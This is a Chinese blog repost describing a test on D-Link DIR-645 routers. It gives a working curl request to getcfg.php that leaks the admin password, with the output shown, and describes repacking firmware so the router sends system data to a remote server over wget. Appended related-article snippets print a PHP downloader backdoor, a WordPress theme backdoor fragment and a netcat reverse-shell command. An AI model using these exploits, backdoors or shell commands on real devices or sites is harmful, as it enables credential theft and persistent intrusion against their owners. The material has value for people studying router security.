dir-645后门植入测试

最新推荐文章于 2024-10-10 12:45:21 发布
最新推荐文章于 2024-10-10 12:45:21 发布
阅读量149 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/h3rbert/p/5776673.html
版权

# dir-645后门植入

dir-645有一个远程身份绕过的漏洞,可以post一些制定参数到路由器从而拿到密码

 

获取管理员密码:

curl -d SERVICES=DEVICE.ACCOUNT http://<device ip>/getcfg.php

通过上面那个漏洞获取到管理员的账号密码

 

zhangbo@zhangbodeMacBook-Air ~> curl -d SERVICES=DEVICE.ACCOUNT http://192.168.0.1:1080/getcfg.php

<?xml version="1.0" encoding="utf-8"?>

<postxml>

<module>

<service>DEVICE.ACCOUNT</service>

<device>

<gw_name>DIR-645</gw_name>

 

<account>

<seqno>2</seqno>

<max>2</max>

<count>2</count>

<entry>

<uid>USR-</uid>

<name>admin</name>

<usrid></usrid>

<password>KU-820_FA(2015)</password>

<group>0</group>

<description></description>

</entry>

<entry>

<uid>USR-1</uid>

<name>user</name>

<usrid></usrid>

<password></password>

<group>101</group>

<description></description>

</entry>

</account>

<group>

<seqno></seqno>

<max></max>

<count>0</count>

</group>

<session>

<captcha>0</captcha>

<dummy></dummy>

<timeout>600</timeout>

<maxsession>128</maxsession>

<maxauthorized>16</maxauthorized>

</session>

</device>

</module>

</postxml>

zhangbo@zhangbodeMacBook-Air ~>

 

其中一栏显示了admin的账号密码

<entry>

<uid>USR-</uid>

<name>admin</name>

<usrid></usrid>

<password>KU-820_FA(2015)</password>

<group>0</group>

<description></description>

</entry>

 

使用得到的密码登录路由,提示登录成功

 

下载了对应的路由器固件并且将固件解压出来之后,在固件的开机启动项中写入了一个获取系统内核的命令,并且使用路由器的wget命令传到一台远程服务器。

之后将固件压缩成一个有后门的bin文件,使用路由器管理界面的固件上传将后门固件更新上去。(远程服务器已经在监听http访问日志) 等待上传完成之后就可以看到有日志记录了。可以看到test页面的test参数返回了路由器的内核信息,因为test.php这个页面是不存在的 所以是404.

使用另外一个漏洞远程连接到路由器,在路由器内使用命令可以看到内核信息和返回的信息时一样的。证明后门植入成功

 

以上仅是测试,测试完毕之后已经刷回官方固件。

 

转载于:https://www.cnblogs.com/h3rbert/p/5776673.html

weixin_30840573
关注
物联网漏洞挖掘入门--DLINK-DIR-645路由器栈溢出漏洞分析复现
墨痕诉清风的博客
09-11 3801
https://www.rapid7.de/db/modules/exploit/linux/http/dlink_hedwig_cgi_bof 这个栈溢出的原因是由于cookie的值过长导致的栈溢出。服务端取得客户端请求的HTTP头中Cookie字段中uid的值,格式化到栈上导致溢出。通过对漏洞点进行分析,搭建模拟环境并完成整个漏洞利用过程。 (文章中有不足之处,还请各位......
D-LINK路由器后门漏洞测试方法
热门推荐
myths_0的专栏
03-01 1万+
国家互联网应急中心 http://www.cert.org.cn/publish/main/9/index.html 多款D-LINK路由器产品存在后门漏洞 (受影响的D-LINK路由固件版本涉及DIR-100、DI-524、DI-524UP、DI-604S、DI-604UP、DI-604+、TM-G5240、TM-G5240、BRL-04R、BRL-04UR、BRL-04C
DLT645 测试工具
04-08
是一个dlt645协议测试工具,支持2007版的协议,里面有最新的解析工具和使用说明,特别好用
645测试软件二合一.zip
06-30
DL/T645 测试软件二合一 DL/T645 自动测试 电表 湖南规约 天津规约 黑龙江规约 东软 含大量测试用例
Dir-645任意文件读取漏洞
Yale的博客
05-26 562
本次实验分析及复现的漏洞来自于2017年Hack2Win 黑客竞赛,举办方在公网上提供 D-Link 850L 路由器作为攻击目标,竞赛持续了两个月,最终确定了3个漏洞: Remote Command Execution via WAN and LAN Remote Unauthenticated Information Disclosure via WAN and LAN Unauthorized Remote Code Execution as root via LAN 第三个漏洞受限于环境无法复现,本
php植入后门,网站被植入后门代码
weixin_29539039的博客
03-18 358
郎朗坤error_reporting(0);if($_GET['act'] == 'dl'){echo ('FN:URL:');if($_SERVER['REQUEST_METHOD'] == 'POST'){file_put_contents($_POST['fn'], file_get_contents($_POST['url']));}exit;}if($_GET['act'] == 'ul...
PHPStudy后门植入代码和利用分析
manok的专栏
10-13 1300
PHPStudy软件是国内的一款免费的PHP调试环境集成包,一般在本机调试情况下使用,当然也有一些企业在生产中也可能使用。该后门首先由ChaMd5安全团队发布监测方法和后门位置。该软件被恶意攻击者攻击,注入了后门,通过远程控制抓取账号密码等信息传固定服务器上。 要检查安装的phpstudy是否有漏洞,可以使用下面脚本(安识安全团队撰写的,不重复造轮子了) #encoding:utf-...
Metasploit渗透测试实战:利用漏洞植入多个隐蔽后门
Metasploit是一款开源的渗透测试框架,由Rapid7公司开发维护。它集成了多种渗透测试工具和资源,帮助安全专家识别和利用系统中的漏洞。Metasploit包含丰富的模块库,支持从信息收集、漏洞分析到漏洞利用等多个阶段的...
网络对抗技术-Exp2-后门原理与实践 20181314
weixin_46014245的博客
03-15 432
一、实验内容 1.使用netcat获取主机操作Shell,cron启动 Windows获得Linux Shell 在Windows下使用ipconfig查看本机IP win+r 输入cmd,打开监听 nc -l -p 1314 在kali中反弹连接Windows,nc 172.16.214.132 -e /bin/sh,使用-e选项执行shell程序 Windows成功获得kali的shell,利用ls,whoami指令查看相关信息 Linux获得Windows Shell 在kali中使用ifconfi
一个不易被发现的PHP后门代码解析
10-25
随着技术的发展,攻击者可能会采取更加隐蔽和复杂的手法来植入后门,因此,无论是网站开发者、系统管理员,还是网络安全专家,都需要不断提升自身的专业知识和技能,以有效应对各种网络安全威胁。
气死了,好好的wordpress主题,被人植入后门程序
06-22 747
最近一直在研究wordrpess主题,但不知道为什么,新建的网站浏览量很好,但是搜索内容几乎为零,我看了下大体的浏览方向,发现IP地址都在河南地区,我就奇怪了,什么人比我还用心,天天打开我网站看啊。 今天在检查代码的时候发现我的wordpss主题中被人插入了如下的代码: <?php function _verifyactivate_widgets(){ $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FI
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4541
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
DIR-645组合拳漏洞
Yale的博客
05-26 611
本次实验分析及复现的漏洞来自于2017年Hack2Win 黑客竞赛,举办方在公网上提供 D-Link 850L 路由器作为攻击目标,竞赛持续了两个月,最终确定了3个漏洞: Remote Command Execution via WAN and LAN Remote Unauthenticated Information Disclosure via WAN and LAN Unauthorized Remote Code Execution as root via LAN 第三个漏洞受限于环境无法复现,本
揭秘家用路由器0day漏洞挖掘技术读书笔记 D-Link DIR-645 authentication.cgi溢出漏洞分析
houjingyi的博客
10-04 2134
固件下载地址 漏洞描述如下。 上一篇讲了DIR-815 hedwig.cgi中的漏洞成因及利用方式,这一篇来讲DIR-645 authentication.cgi中的漏洞成因及利用方式。下载之后解压缩得到dir645_FW_103.bin,通过binwalk提取出文件系统。 需要分析的还是/htdocs/cgibin这个程序。我们根据POC使用下面的脚本直接进行动态调试。 a
使用API接口创建短链接【PHP版】
weixin_43833373的博客
10-10 690
C1N短网址(c1n.cn)还提供了丰富的短链接管理的API接口,只需进行简单的接口调用,就能将稳定好用的短链接系统接入到自己的产品中,极大地降低了开发成本。上述代码中使用到的token需要前往C1N短网址(c1n.cn)-控制台-我的信息进行查询。
0.0.0.0 127.0.0.1等几个特殊的IP地址
最新发布
zhurobert的博客
10-10 557
0.0.0.0 127.0.0.1 255.255.255.255等特殊地址
PHP智慧餐饮新风尚点餐系统
2401_84593614的博客
10-10 613
总的来说,智慧餐饮新风尚点餐系统不仅为顾客带来了便捷、高效、个性化的点餐体验,也为餐厅提供了有力的运营支持。它让美食与科技实现了完美结合,让我们在享受美食的同时,也能感受到科技的魅力。如果你还没有尝试过这款点餐系统,不妨找个机会去体验一下,相信它会给你带来不一样的惊喜!
D-LINK DIR-615无线路由器安装与设置指南
"D-LINK DIR-615是一款无线宽带路由器,主要用于家庭或小型办公室的网络设置和管理。本文档提供了该路由器的快速安装、设置和使用指南,适用于软件版本为2.20或2.21的用户,以及中文版用户可参考D-Link官网的相应...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值